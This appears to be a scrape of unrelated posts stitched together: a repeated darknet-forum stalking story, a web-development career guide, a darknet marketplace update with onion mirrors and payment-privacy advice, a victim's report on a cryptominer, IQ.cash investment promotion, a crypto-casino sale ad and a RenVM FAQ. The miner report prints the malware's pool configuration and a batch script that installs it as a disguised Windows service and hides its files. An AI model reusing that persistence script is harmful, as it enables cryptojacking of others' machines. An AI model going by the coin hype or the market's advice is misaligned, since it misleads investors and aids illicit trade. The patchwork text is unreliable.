Why I stopped using the dark web

My story begins a few years ago I decided to use my computer skills to run a small darknet forum mainly just to share information without censorship.
At first I was extremely paranoid about my site getting hacked and having my anonymity being compromised so I went online and began to research everything that I would need to ensure my own safety.
After countless days of scouring blogs, forums and other material I decided I was ready now I didn't have any money so I couldn't just buy a VPS and host the site off shore or whatever, so I decided to use my old laptop after all I wasn't planning on running a major website.
So after setting the server up and what I thought was literally every single thing I could to do harden it against attack I put the site online, everything went great for a couple of months, donations rolled in as the the user base grew larger and larger.
After around 5 months the user base had gotten so big I had to upgrade and migrate everything to a new PC which I built just to host the forum and from there everything seemed perfect, the site was running smoothly and there were no issues with the migration until one day when I came home and noticed the PC had frozen I didn't think much to it maybe just a software bug caused it so I rebooted and that's when it was clear to me something was wrong the PC lit up and beeped a few times then shut off so I thought to myself ok so it's a hardware issue, after a few hours trying to diagnose the issue I figured it out and it turned out the ram had been corrupted I took it back to the store since it was still under warranty, the customer rep just told me it might have just been a faulty stick.
When I got home I replaced the stick of ram and had the site back up and running within a few hours, everything seemed to be perfect again I apologized to the users for the down time and everyone seemed to be happy enough.
Fast forward a few more months, the forums been up and running for a around a year and a half now this is when things started to get really weird. I finished work on a Friday, it was a gorgeous day in the middle of summer I came home had something to eat and sat down in front my PC and noticed I had a message, upon opening the message I realised that somewhere I'd messed up now don't get me wrong I'm not like Assange or anything so I don't really know why anybody would actually target me but the world is a crazy place so whatever.
The message had my details from my name, address, bank details, passwords, private emails, private messages everything from nearly every single device I owned I freaked out and immediately took the PC offline, turned my internet off but little did I know that this guy had done his research after a couple of hours pacing my room I received a text message.
"I know everything about you"
The message was sent via some type of SMS service so there was no way to trace it and then my phone rang.
"Don't talk just listen, I know everything there is to know about you all I want is 2 Bitcoin or things get worse, I'll send you a text with the wallet details"
The phone call ended just as quickly as it started, I opened my laptop up and checked my Bitcoin wallet there was enough left over from the donations just to pay this guy off and hope that would be the end of it, so I entered the guys details and sent the payment, my phone rang again.
"Thank you for complying, unfortunately someone I know really likes you."
He hung up, panicking I tried calling the number back an automated message began to play "the number you have dialled has not been recognised"
A few hours pass and I began to think to myself well maybe the last call was just him having fun and decided after a long day I'd just go to bed.
Sometime around 2am I was woken up by the sound of banging at my front door, I jumped out of bed and turned on all the lights grabbing a knife from the kitchen I walked slowly towards the window and looked out I could see someone standing by a car when they spotted me they got in and drove off I rushed to the door in hopes I might be able to get a license plate but by the time I'd opened it they'd already turned the corner as I turned I noticed an envelope on the floor I picked it up, went back inside and locked the door, closed the curtains and sat in the kitchen I placed the envelope on the counter and stared at it for around half an hour trying to muster up the courage to open it, did these guys really come to my home I thought to myself.
After the half hour was up I decided enough was enough I opened the envelope and pictures fell out onto the counter they were of me sleeping, these guys had not only been outside my house they'd been inside whilst I was sleeping the images had been edited and strange love hearts had been added next to me so now I was sufficiently freaked out, I didn't go back to sleep and when the sun broke the darkness I decided to head to the police station and tell them everything I hadn't broken any laws so I hoped they would just help me at least after hours of explaining everything to them they told me there was nothing they could do.
At this point I had never felt so alone in the world, I was scared of what this guy was planning for me, I didn't have the foggiest idea what I was supposed to do or expect so I decided to wipe everything my laptop, PC and phone I picked up everything I needed stuffed it all into a bag and decided to leave I had a couple of friends that I knew I could rely on so I called up my old buddy Marcus and we met had a few beers and I explained everything to him, he offered me a place to stay and I hoped that would be the end of it how wrong I was.
A few days later it happened again there was a knock at the door first thing in the morning, me and Marcus both went out to find another envelope on the floor, same thing pictures of me sleeping but these were in Marcus's house I started freaking out again and Marcus just said
"Ok well we need to do something maybe set a trap or something"
So we went over numerous ideas everything you could think of from cameras to baiting him and we settled on the idea of staying up during the night and locking him in the room, we filled the bed up with pillows, setup cameras and even barred the windows in the room we hid in the room next door after a few hours had passed we heard the lock rattling on the front door and we knew it was game time, we'd left the door just slightly ajar so we could see outside as he went past and the moment he went into the room we both sprung to action quickly as we could we closed the door and locked it from outside using a chair and a metal bar there was only one way he was getting out and he'd have to destroy the door we could see the silhouette of him as he paced the room quietly it was creepy as fuck, we called the police as we kept an eye on him.
At last I thought I can finish this and move on with my life just as the police arrived we noticed the guy take a gun out and place it to his head, he held a sign up which read "I love you" and he pulled the trigger, the police barged in guns drawn told us both to get the floor, we complied and shouted "he's in there" pointing at the door.
The police removed the makeshift lock and entered the room, called for an ambulance and put me and Marcus in the back of a police car.
I'd been sat in the interview room for a good couple of hours I guess whilst they carried out the investigation when a detective came in and say down in front of me opening a folder and placing pictures on the table "Do you know her" "Her?" I said looking at the pictures "no" I replied confused , he looked at me and said "this is the person who's been stalking you" and he then began to tell me they had visited her home and found a shrine with photos of me all over the place from restaurants to the gym even shopping.
He went onto tell me that she'd been the one that sent the messages, made the phone calls etc and they'd also found a diary which had some kind of future plans for me and her, she wanted me to be her husband and we'd been chatting for around a year and half from the moment I started the forum after I explained everything the detective said I was lucky to be alive, she had actually planned to drug me and kidnap me, she had even made some makeshift lock bed so I wouldn't be able to escape.
To this day I feel lucky and I haven't been on the darkweb since.

Sobre Tibia, gold farmers y un caso de ayuda y éxito PT2. Son muy buenos consejos de cómo comenzar a programar profesionalmente

Una vez más, reconocimiento al autor original de los post International-Unit-8
Hello,

I have gotten so many replies and messages since my last post in this thread, that I can't answer them all individually. Previous topic:

https://www.reddit.com/TibiaMMO/comments/h8tu5u/a_great_tip_for_brazilians_venezuelans_and_othe

It has been shared on multiple subreddits so I have no idea where to even post this. But I'd like to come up with a follow-up thread with some more information. The internet is the most powerful tool that mankind has ever invented. You have the ability to reach thousands, millions and even billions of people with just a computer and some internet access.

If you're on this subreddit, chances are you're already playing Tibia and you already have a computer and internet access. It doesn't need to be the best internet, but as long as websites will load (eventually) you are good to go.

In this topic I will go more in-depth on web development and software engineering. If you have a very slow internet connection, you may want to look into web development instead of software development. An application/software is much heavier (larger file size) than a website. And most developer jobs require that you send and download files, back and forth, between you and your company's server. So if you feel like your internet is too slow to send a lot of files - do not worry! There are plenty of jobs.

First, I will go through some more details on how to learn web development and software development. After that, I will list a few other kinds of jobs that you can do remotely. These types of jobs can be done from anywhere in the world as long as you have internet access.

Part 1: Some languages you should learn

What is web development? Well, it can be a lot of things. You perhaps make websites for shops/restaurants/hair dressers/dentists, or you work for a big company and work on their web application, like Outlook, Discord or Spotify (which can all be accessed via a browser: their web app). You can also work with design and user experience, instead of programming. Being a web developer can mean so many different things, it's impossible to name them all. But most web developers are just developers: they program. They make websites, and they either sell the websites to companies (as a consultant) or you work full/part-time for a company.

I can not provide in-depth information about every single thing, but I can give you some pointers. The very basics any web developer should know is this:

HTML (HyperText Markup Language) - it's what almost all websites use as a foundation. This is not a programming language, but it is a markup language. If you want to build websites, you pretty much have to know this language. Don't worry though, it is easy. Not so much to learn. You can learn all about it in a few weeks.

CSS (Cascading Style Sheets) - it's what will add colors and shapes to your website. If you want to focus more on design (also known as front end development) then this is where you want to gain a lot of knowledge.

Python - A very simple language to learn. This language is very often the first programming language that developers start using. You can use it for a lot of things. This language is used in the back of a lot of websites. Google has been using Python for years and still is. It's great for web scraping and making web requests. If you want a language to practice your algorithms, then this language is awesome.

PHP - This used to be a very popular language, but not so much these days. However, it is very good to know how this works because it's very simple to learn and also very functional in some cases. If you want to transmit or withdraw information from a database to your website, then this (in combination with SQL) is a great way to do so. Whenever you make a login system or a contact form, the data must be sent somehow to a recipient or a database. PHP will help you do that. It is a server-side language, which means it will run in the back of the website.

SQL - To be able to communicate with databases (for example: save data, update data, or insert data) you can use different languages for that. But SQL is probably the most widely used language for this. It is basically just a bunch of commands that you tell your website or app to do. If you have a web shop for example, you will need a database to store all your product information in. You can for example use MySQL as your database and then use the SQL language to extract data from your database and publish it as a list of products on your website.

JavaScript - Perhaps the most powerful language at the moment. Anyone who is good at JavaScript will be able to learn most other modern programming languages. In recent years, the demand for good JavaScript developers has skyrocketed. It's because more applications are becoming web based, and JavaScript is probably among the most useful languages to use. You can use it for so many things. Previously JavaScript was only being run on the client side of the website (that means in the user's browser). But in recent years, there has been massive development of this language and you are now able to build servers, connect to databases and do very powerful web applications using just this language. A great tutorial for JavaScript was made by Tony Alicea: https://www.youtube.com/watch?v=Bv_5Zv5c-Ts This video is "just" 3.5 hours, but it's the intro. There is a much longer version of it, and you can download it for free if you search for it. Just find it as a torrent and watch it. It's probably the best tutorial I have seen for JavaScript.

C# - It's pronounced as "C Sharp". This language has been dominating the software engineering market for decades at this point. Everyone loves it. It's relatively easy to learn and you can build a lot of stuff in C#. It's very much like JavaScript, but focuses more on application development rather than website development. I would however try to avoid learning this language if you have very slow internet, since you will most likely be sending a ton of files back and forth. But if application (computer & phone) is your thing, then this language is great. There are so many tutorials on this, but there is 1 channel on YouTube which teaches a lot of the basics in C# (and many other languages) and that channel is called ProgrammingKnowledge. Sure, his C# videos may be old now but most of it is still relevant and useful. You will learn a lot by watching his videos. It's always good to start from the beginning and then when you're familiar with that, you can learn more about the recent updates in C#. https://www.youtube.com/watch?v=V2A8tcb_YyY&list=PLS1QulWo1RIZrmdggzEKbhnfvCMHtT-sA

Java - This is pretty much 90% identical to C# as I wrote above. Widely used, relatively easy to learn the basics and there's plenty of jobs. If you like making android apps, this language is for you.

Part 2: Technologies and useful tools

To become a web developer you will need a few tools. You need a text editor, a FTP client, a SSH client and some other things. Also a good browser.

Text editor: Visual Studio Code, Atom, Sublime Text, Brackets - There are many different text editors but at the moment, I highly recommend Visual Studio Code. It has so many built-in features it's honestly the only thing you may need.Don't forget to install Notepad++ as well - this very basic editor is so handy when you just quickly need to edit some files.

File archiving: WinRar, 7-Zip - You need some way of archiving projects and send it to your customer or employer. These are basic tools anyone should use. I personally use Winrar.

FTP (File Transfer Protocol): FileZilla - This tool will allow you to connect to your website's file manager and upload your files to it. There are many tools for connecting to an FTP server but this is the most popular one, it's simple and it works great.

VPS (Virtual Private Server): Amazon Web Services, Google Cloud - If you want to practice building web applications or want to host your own website as a fun project, it's great to use a VPS for that. Both Amazon and Google offers 365 days of free VPS usage. All you need is a credit card. However, they will not charge you, as long as you stay below the free tier limit. A VPS is basically a remote computer that you can connect to. I highly recommend that, if you have a slow internet connection. Those VPS-servers (by Amazon and Google) usually have 500mbit/s internet speed, which is faster than most countries in the world. You simply connect to them via Remote Desktop, or by SSH. Depending on what type of server you are using (Windows or Linux).

SSH (Secure Shell): Solar-PuTTY, PuTTY - If you for example have a web server where you store applications and files, a great way to connect to it is by using SSH. PuTTY is pretty much the standard when it comes to SSH clients. But I really love the version created by SolarWinds. When you download that one, do not enter your personal details. Their sales people will call you and haunt you! Haha.

File Searching: Agent Ransack - When you have many files and try to locate a specific document or file, you may want to use something like Agent Ransack. Much faster than the traditional search feature in Windows and it is much more accurate.

IDE / Code Editor: Visual Studio - Great tool to use when you want to create applications in C# for example. Do not confuse this with Visual Studio Code. These are two very different tools. This tool (Visual Studio) is more designed for Windows applications. Not just websites. I only recommend getting it if you plan to make programs for Windows.

Web host & domain: NameCheap, Epik, SiteGround - If you develop websites on your own, or maybe want to create a portfolio website, you will need a domain name and web hosting. I have personally used all of these 3 and they are very cheap. NameCheap has some of the cheapest domains and great web hosting for a low price. Their support is also great. Same with SiteGround. And if you want to buy a domain anonymously (with Bitcoin for example), then you can use Epik. Low prices and great customer service on all these 3 websites.

Web Server: XAMPP, Nginx - If you plan to practice PHP, you will need to have a web server on your local computer. If you have Windows, I would highly recommend installing XAMPP (Apache). It is very easy to use for beginners. If you're on Linux, I would recommend Nginx. Also check our PhpMyAdmin if you want to quickly setup a MySQL database locally.Bonus tip: If you use Visual Studio Code to create websites in HTML, CSS and JavaScript: then install the extension "live server" and you can run your applications on a live server without setting it up yourself. Tutorial: https://www.youtube.com/watch?v=WzE0yqwbdgU

Web Browser: Mozilla Firefox, Microsoft Edge Insider, Google Chrome - You need one of the latest web browsers to create websites these days. Since I prefer privacy over functionality, I've always loved Firefox. But recently, Microsoft has been improving its new version of Edge a lot (based on Chromium) and it's also very popular. If you want all your personal details to be saved and have good tools for web development, then use Google Chrome. Don't forget to utilize the built-in developer tools. You can access it in any of these browsers by pressing F12.

If you want to learn in-depth about algorithms, data structures and more. Then you can take a look at the curriculum of the top-tier universities of USA. Such as: UC Berkeley, Harvard and MIT. These courses are very hard and are specifically for people who want to become experts in software engineering. You can enroll some of them for free, like the one on Harvard. And by having a such diploma (which costs $90 extra) can get you a lot of job opportunities. You can enroll those courses if you want, but it can have a fee. But just take a look at what they are studying and try do their exercises, that is 100% free. Get the knowledge. It's mostly on video too! These course below are the very same courses that many of the engineers at Facebook, Google, Amazon, Apple, Netflix, Uber, AirBnb, Twitter, LinkedIn, Microsoft, etc. has taken. It's what majority of people in Silicon Valley studied. And it's among the best classes that you can take. These course are held by some of the world's best professors in IT.

Why I stopped using DarkWeb

My story begins a few years ago I decided to use my computer skills to run a small darknet forum mainly just to share information without censorship.

Six months in business, almost 100% uptime, 60.000 users and some changes

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
* We have reached 6 months (with almost 100% uptime) and 60.000 users!
* Users can now change their PGP keys by themselves. Access to old key is required
before changes. Back up your PGP key and do not lose it. Treat it with the same
respect you treat your cryptocurrency wallets (or real wallets for that matter).
Except under very special circumstances if you lose access to your PGP key you lose
access to your account. If your key expired you won't be able to log in, however
you can contact us, sign a message with your old key and we will restore access.
Speaking of PGP: STOP using Igolder! You are basically GIVING your address to a
third party. If you don't care about that maybe you care about the fact that some
vendors cannot decrypt Igolder messages. Use a modern PGP client, most of them are
point and click.
* Order payment window has been increased to 120 minutes (two hours). That is more
then enough to make a payment. Payments received after the order is canceled may be
lost, so if paying by Bitcoin make sure you use a decent transaction fee. Stop paying
your orders from online wallets / exchanges. Send the coin to your local wallet first
because paying from online wallets / exchanges:
- - Is dangerous for your privacy.
- - Some of them add extra verification/delays and you won't make the 2 hour window.
- - Some use a ridiculously low transaction fee and the transaction will be delayed.
Transfer to your local wallet first and don't be cheap on the transaction fee. Late
payments create unnecessary support work and you may lose your coins.
* Order history and messages are now deleted after 45 days instead of 30.
* Users can edit feedbacks for 30 days after an order is finalized (escrow released).
* Added "Top 20 Vendors" based on number of sales and feedback.
* Added random sort to "Search".
* On "Your orders" page we added the exact time when the auto finalize can be extended
or the order can be disputed. On the order tab you will find a yellow box showing the
exact date and time when Dispute and Extend AF buttons will be available.
Eg: "You can dispute/extend AF between 2020-02-28 18:44:51 and 2020-02-29 18:44:51 (UTC)"
* Added two new V3 mirrors:
http://kqqhwuqucdequr5buqkpdnqfdyimkro7g67oxifbs7s5r76czxpjxvqd.onion
http://kagznfeuoloobdegtvnh6cdmem7rpf3rt2emxfh7aaqnj2h7gn763gad.onion
* Bug fixes and stability improvements.
Thank you all for your business and support!

MoneroOcean pool owner supports botnets

Hi guys,
As of late my vps that was running Microsoft's RDP got hacked. The attacker ran a malware miner named system.exe that was using 99% CPU. I'm gonna post a screenshot of all of it right here so he gets publicly exposed for his deeds.
https://imgur.com/a/yArkTR8
By further investigation I found that this miner uses config.json as it's configuration file and I'm posting the contents also publicly here:
{ "algo": "cryptonight", "api": { "port": 0, "access-token": null, "id": null, "worker-id": null, "ipv6": false, "restricted": true }, "asm": true, "autosave": true, "av": 0, "background": false, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 0, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 100, "pools": [ { "url": "gulf.moneroocean.stream:80", "user": "44CZd8EvSktM2FzqMVbMBc9pWDcL45yYTWY3VzdymUbjDG6F1734vQh4dj9hjn7tj3eFohS8NGSDSNNVzBxLt7Eb8Vw8vrq", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": false, "variant": -1, "enabled": true, "tls": false, "tls-fingerprint": null } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "threads": [ { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true } ], "user-agent": null, "watch": true }
cmd.bat contents are the following:
attrib -a -s -r -h C:\WINDOWS\Debug\nat* net stop Networks taskkill /f /im system.exe C:\WINDOWS\Debug\nat\svchost.exe install "Networks20181019" C:\WINDOWS\Debug\nat\system.exe sc config "Networks20181019" DisplayName= "Networksr20181019" sc description "Networks20181019" "Microsoft Windows Networks" Set ProcessName=system.exe sc start "Networks20181019" attrib +a +s +r +h C:\WINDOWS\Debug\nat* echo u/off del %USERPROFILE%\Desktop\0.exe
I've scanned everything on VirusTotal and upon visiting the pool I've noticed that the miner has a hefty 50 KH/s. I've also contacted the pool owner via Discord and can post the whole discussion if anyone is willing to see it. He doesn't want to ban the miner, shortly.
I'm not so familiar with Monero but I had Bitcoins and I fully support the mining community. I understand that people with botnets increase difficulty for normal people to make a profit. I've also reported this guy to his ISP by examining the IP found in Event Viewer, since he didn't use a VPN (the IP isn't detected as proxy). I won't post the IP's publicly.
What more can I do? The pool owner also threatened me to report another XMR wallet address to SupportXMR pool because he thought I was a competitive attacker. I can also give that address aswell.
Thank you for reading and stay safe :)

Why I stopped using DarkWeb

My story begins a few years ago I decided to use my computer skills to run a small darknet forum mainly just to share information without censorship.

To this day I feel lucky and I haven't been on the darkweb since.

why I stopped using DarkWeb

My story begins a few years ago I decided to use my computer skills to run a small darknet forum mainly just to share information without censorship.

The IQ.cash project team has already developed for their investors the IQ Masternode network that they use. Also, the IQ coin is presented on such well-known exchanges as HitBTC, BitHumb Glogal, P2PB2B, CoinsBit, BitForex, CREX24 and Mercatox. Therefore, traders can easily trade it! If an investor has more than 3000 IQ on his balance sheet, then he can receive passive income 57% of the block, miners, in turn, receive 43% of the block. We still have 6%, which are reserved for DAO (decentralized autonomous organizations), that is, they are used to invest, for example, in ICO projects, websites, trading bots, and improving the entire IQ ecosystem . cash and so on. All of these unique features can help make the IQ.cash platform popular around the world. You may come to this article to find out about the massive passive income, but worth noting that you should know what it is about. Think about it, investing money to something vague is very risky. Thus, what is IQ cash? To make it brief, this is another cryptocurrency that has quite clear and potential income. Just like bitcoin, this IQcash has a potential fluctuation which increases and give great passive income through the magnificent distribution splits. It is also easy to say that IQ cash is an investment master nodes Cryptocurrency which is open for everyone. In this matter, whether it is for investors, traders, or even miners. Yes, those who are familiar with the world of cryptocurrency are the target of this project. The main task is to provide instant anonymous online payment along with the investing system. The IQ cash platform ecosystem work as DAO (decentralized Autonomous Organization.

One thing that makes this digital money gain quite a lot of participants in the available wallets. Not a real physical wallet, but one to store all your cryptocurrency. In this case, the wallet is available for Windows, Linux, and Mac. You can choose one that fits with the equipment you have. Along with that, you can install the masternode on your home pc or Linux VPS. Your masternode will just do the earning rewards, without all the other extra features. If you want to install, you can use PC running windows Mac or even Linux. However, on VPS you have to use Linux with Ubuntu 16.04 version. Other than that, there are some requirements you have to fulfill. The first one is having a 3000 IQ or more on balance. Even 3001 coin is acceptable. Then, use only one PC for dedicated IP-address and also a 24/7 network connectivity (network loos less than 30 – 60 mins) without any interrupted operating system. Security - it is the most considered aspect of investment, as we know that investing in cyberspace is very risky. Therefore, IQ.Cash presents the security of investor accounts, where all accounts cannot be blocked and, most importantly, account funds can only be accessed by the account holder. Masternodes - how do we know IQ. Cash uses the PoW consensus algorithm that supports the Masternode system. this certainly adds to the intrinsic value of this project, which economically can add a value of approximately 43% and indirectly increases passive income by around 57% for all participants in the masternode. Masternode provides network integrity. Transaction anonymity and transaction speed. Of course, to run a masternode system, everyone can only invest 3000 IQ and then immediately enjoy the results obtained with this IQ.Cash masternode feature. Anonymity of the transaction - this is more about the privacy of the transaction itself. where users can completely trust the system. and you don’t have to worry about data access by irresponsible parties. because the system automatically encrypts data when transferring and receiving assets

https://preview.redd.it/7k0i4s47hdx41.png?width=640&format=png&auto=webp&s=cc9b5ced02917e1549e9b963805785df93b332d2
The IQ.cash platform operates on the basis of the POW consensus with support for a system such as MASTERNODE. And this is very cool, since this system makes the project more interesting and attractive for crypto enthusiasts. Indeed, thanks to the MASTERNODE system, miners receive 43% from mining, and people who own MASTERNODE receive a passive income of 57%. MASTERNODE supports the network, i.e. data privacy, transaction anonymity and speed, and much more. To become the owner of MASTERNODE you need to have more than 3000 IQ on your balance sheet. Anonymity. Transaction anonymity is provided by the PrivateSend algorithm. Users can feel safe and not worry about their assets. Since this system perfectly encrypts data. Therefore, you can safely send and receive any crypto assets. ASIC RESISTANCE. This technology is struggling with such a serious problem as a significant acceleration in the growth of network complexity. IQ network . cash works on the basis of the NeoScrypt algorithm, which is struggling with this problem. High transaction speed. Such an instant transaction speed, because the InstantSend algorithm works. Just think about it, the transaction speed is only about five seconds. Absolute decentralization. Affect both participants and crypto assets of the IQ network . cash no one can. Because everything will be safe, reliable and transparent.
Only requires a transaction speed of only about 5 seconds / transaction. And all transactions are done instantly, so this will provide a very efficient way of working for the users later. more and more projects have started to appear, whose actions are directed to one of the niches of our daily activities. This is excellent, we have been waiting for this for many years, but at the moment, strange as it may seem, projects aimed exclusively at the crypto industry have become a minor order of magnitude. It was simply impossible to take it. And now a project has appeared on the horizon that positions its activities exclusively as a useful product for mining companies, investors and even traders. As it turned out, the team has a work product, whose currency is traded on many major exchanges. That's good luck, I smiled and started to study the IQ.cash project and its capabilities. Go back to the main interface and choose a personal tab (bottom right corner). Then, move to the next phase by choosing the Fee & Payment tab. You will see fee balance, FLS, BTC fee deposit address, and other information. In here, copy the IQ.cash wallet address in the FLS address tab. To move on to the next stages, you should have bought the required number of IQ cash (3000 IQ cash) beforehand. You can buy the IQ cash masternode from the official sites.

• ¿Puedo utilizar Proxy, Vps, vpn, etc?

SELLING: CRYPTO CASINO | READY TO RUN | JACKPOT & CF | 950$ BTC (Price reduced)

The website has two games: jackpot and coinflip, both are multiplayer games and you earn a static fee(currently 5%) from each game, every player can have two balances(bitcoin and litecoin) and they play using it or tip other users
our website includes:
-a referral system with different ranks based on amount of referred people
-a leaderboard, a game history modal, betting statistics, ability to upload avatar and edit email and/or password
-a provably fair system based on stake.com algorithm, with a verification form for each game the private seed is printed at the end
-a contact modal, an admin panel with some pages ready(users, deposits, etc), admin chat commands and user tip command, ability to use unicode in chat
-svg animations during the games and instant results update
in the demo version payments are not implemented, however I have a coinpayments version ready with withdraw and deposit ipn working for both currencies
the websocket server is made in c# while the rest of the backend is made with php, we use svg for some animations and threaded javascript(web workers)
the deal includes every support you may need to better understand our sources or to set it up, the demo is hosted on a cheap windows vps, all assets including the design belong to this project and were made from scratch
let me know if you have more questions
if you signup on the demo you can test it out I will give you some balance, also if you want to see admin panel I can show you
the server is secure from any kind of xss or sql attack, it has been pentested already by me and heavily debugged
for websockets I'm using the fleck library and there are spam/anti-ddos protocols implemented, no ssl yet but it's easy to add, currently splitting in two ports for clients

Best General RenVM Questions | August 2019

Best General RenVM Questions of August 2019

These questions are sourced directly from Telegram, other monthly FAQ can be found here: https://docs.renproject.io/darknodes/community/monthly-community-faq
Q: So RenVM is essentially a BFT protocol (with 1/3 malicious nodes) that does ECDSA threshold key generation and signing? Is that right?
A: Yes, that's exactly what we have! We are exploring getting this to 1/2 and are confident it is possible, but the current implementation on Testnet is 1/3. Just today we also pushed an update that doubled the speed (and halved the bandwidth) of the sMPC signing algorithm.

Q: Have any tests been done on the speed of Interoperability?
A: The Testnet demo is live and open to the public, have a play with it and let us know about your experience (including speed). We have done some preliminary profiling; numbers look good so far. Fast enough for a single shard to keep up with Bitcoin.
The next version of RZL sMPC is under development and will introduce pre-computations that significantly increase the peak performance of RenVM from 10 TPS to over 100 TPS (these numbers are based on our initial conservative estimates).

Q: Currently, we see a quick performance of the swaps. When migrating to the mainnet (considering there will be real mainnet of say 250 Darknodes and real BTC, ETH, etc.) will it affect the speed?
A: Speed is a complex issue when it comes to RenVM. I'll try and break it down:
The biggest concern for speed is that RenVM needs to wait for a transaction to be confirmed on one chain before shifting the tokens to another chain. When working with Bitcoin this can take hours. -So latency is unavoidable (think of latency as how long a tunnel is) -So what about throughput (how wide the tunnel is)?
First, how to solve the latency problem. Well, we cannot actually solve it because we cannot change Bitcoin. But we can work around it by using "Universal Interoperability." In this model, a third party takes on the confirmation risk. While RenVM waits for the confirmation of a transaction on Bitcoin, the third party steps in and fulfills the Ethereum side of the transaction with BTC that has already been shifted previously. When the Bitcoin transaction is finally confirmed, the third party is refunded using the newly shifted BTC. This means the third party is taking on risk (the Bitcoin transaction may be shuffled away), so they charge a fee to cover this + their services. This means that the shift can be almost instant, and the only thing we need to worry about is throughput.
We believe we can get 10 TPS throughput, which is more than Bitcoin, so throughput isn't a problem (we only need to be as fast as Bitcoin). For other chains that are faster, we can introduce multiple shards. If one shard can do 10 TPS, then 10 shards can do 100 TPS.
I've described this process with Bitcoin, but it works for any pair of chains. Also, the third party cannot be guaranteed to step in (maybe they don't want to take the risk today) but if they do not, then the transaction will still go through but just at the slower speed. If the third party does step in, they're guaranteed to be refunded. So the introduction of "Universal Interoperability" does not introduce any central trust into the system.

Q: So Universal Interoperability is a partially centralized thing?
A: No because any third party can step in and provide the service. Further, the processes involved are all handled by smart contracts.

Q: Has there been a discussion of security in terms of sharding? Getting 1/3 stake and compromising a shard is obviously much easier than compromising the network, what's everyone's thoughts on that?
A: Yes there has; once you move to a sharding model, the risk of an attacker gaining control of a shard becomes a probabilistic problem rather than an absolute one (for example if you're sampling with replacement, in theory, a single attacker can corrupt the whole network).
Let's say an attacker owns enough of the network to have a 2^-1 chance of corrupting a shard (expected time to attack = ~2 days). If you are using a 20/20 multi-sig, where each shard controls one signature, then the chance of corrupting enough shards becomes 2^-20 (expected time to attack = ~2800 years).
In line with this example, the shard could be around N=24 (which would have a corruption chance of ~0.56) so each shard can be very fast (and shards would be running in parallel). Obviously we want to avoid multisigs (they're expensive and not all blockchains can support them) but this is mostly an example of the larger concept: requiring multiple shards to work together.

Q: Just got curious if the bug-fixing and developing has been overwhelming since the release of testnet? How do you feel it's been so far?
A: I wouldn't say overwhelming. It's definitely keeping us busy. Finding bugs and fixing them is actually very satisfying work; it reduces stress by increasing confidence, and this helps improve motivation and productivity.
It's also good to be able to revisit parts of the system and go about perfecting them. Often in software development, there is the adage "never optimize early". Well, the time has finally come to optimize (not just performance, but design, safety, etc.). Everyone wants the thing they build to be perfect, and being able to make that the focus is an awesome feeling.

Q: Is there a reason for having private repos?
A: It's important for the success of the network to maintain a competitive advantage, and important to avoid "day zero" bugs from people that find them but don't report (in the hopes to take advantage). We'll be getting the code (and our maths) reviewed and audited, and probably show it to first adopting groups so they can verify it themselves, and as Mainnet grows we will open-source everything, along with a Transperency Plan that outlines when and how repos will be open-sourced.

Q: My Darknodes still show the old command center. How do I view them on the new one?
A: The new Command Center is for RenVM specifically (and it's only viewable on RenVM Testnet); once we switch Darknodes over to the RenVM network, they will utilize the new Command Center.
To play around with it, put your MetaMask on Kovan Test Network. A video that a community member created can be found here: https://twitter.com/RenIsLyfe/status/1166091169853579265?s=20

Q: Digital Ocean (DO) sent me a message saying my VPS would be down for maintenance, is this an issue?
A: Nope, this is just part and parcel of using a VPS. From time to time, they need to do maintenance. They will inform you if you need to take action.
This is a real-world example of why it's crazy to expect a decentralized network to have all participants online all the time, and why you cannot "incentivize" being online by punishing being offline. It's unavoidable even when there are entire expert teams with years of experience on the job. The more nodes you have, the more likely any one of them is to experience an issue like this at any one time.
Your REN is not at risk if your Darknode does go offline. It is also unlikely that a Darknode that is offline due to these kinds of circumstances will remain offline long enough to be forced out of the network.

Q: Will the community darknodes be partaking in the RenVM Testnet, or are you using your own nodes to test it out, or is it a gradual deploy?
A: The team has about 24 Testnet Darknodes that power it. We may open these Testnet nodes up to a few groups in the Working Group, but no public participation of Testnet Darknodes will be pursued at this time.

Q: A couple of questions for the team: 1) Bonded REN value informs how much value can be securely shifted through RenVM at any given time. If bonded value drops below the threshold, are there any risks beyond incentive to collude which arise? is there any liquidation risk ala TBTCsigners? 2) Does RenVM enforce any time floors/ceilings on shifting/locking tokens? I assume anything like that would be enforced by a third party like Compound?
A: 1. There are collusion risks but we plan to mitigate this by having Darknodes able to "tell on each other" so if you are colluding with someone that you don't trust 100% you risk losing your bond so attacks only really make sense if you own all the colluding Darknodes (which, by definition, isn't really collusion it's buying up a bunch of REN). There is no liquidation risk. This is one key reason why we bond using REN, not another token; the "value of REN" is tied only to the use of RenVM. The safety of RenVM is predicated on the use of RenVM. RenVM is used = RenVM is safe
  1. No time ceilings. We've been having discussions about how to keep Darknode well incentivized to maintain long-term deposits, but (a) most of RenVM's UX is built around handling the native token, not a wrapped version of it (how is a BTC maxi going to get a hold of ETH to use their ERC20 BTC?), and (b) payments will be paid out over time to RenVM not instantly so this creates a more stable income for the Darknodes instead of large but infrequent lumps of pay, (c) we got another trick up our sleeve that I'll be adding to the GitHub any day now, (d) if you have ideas about how to incentive Darknodes to maintain BTC that is being deposited long-term, please feel free to let us know!

Q: Has there been a pattern established where third-parties could pay the gas for the eth transactions needed during shifting? For instance, would it be straightforward for an app dev to pay the gas for the user but add a small additional fee onto the RenVM transaction? They would pay the gas in ETH for the user in exchange for that value collected in BTC or zBTC?
A: This is going to be very straightforward for devs. We are designing examples as we speak to set the standard for doing this and therefore make integration as easy as possible.

Q: Can a RenVM gateway addresses be reused? As in if a user creates a gateway address for 0.1 BTC, can they send exactly 0.1 BTC that address, mint zBTC, and then repeat that process again without creating a new gateway?
A: Currently no, a gateway can only be used once; but we are in the process of creating that feature and it should be ready within the next month or so.

Q: What’s the best way to set up a Darknode if I only have Microsoft?
A: We do not formally support a Windows CLI as of right now, but we are adding Windows CLI support prior to Mainnet, so please do stay tuned.

Running C-lightning on VPS and connecting to my bitcoin full node on windows pc

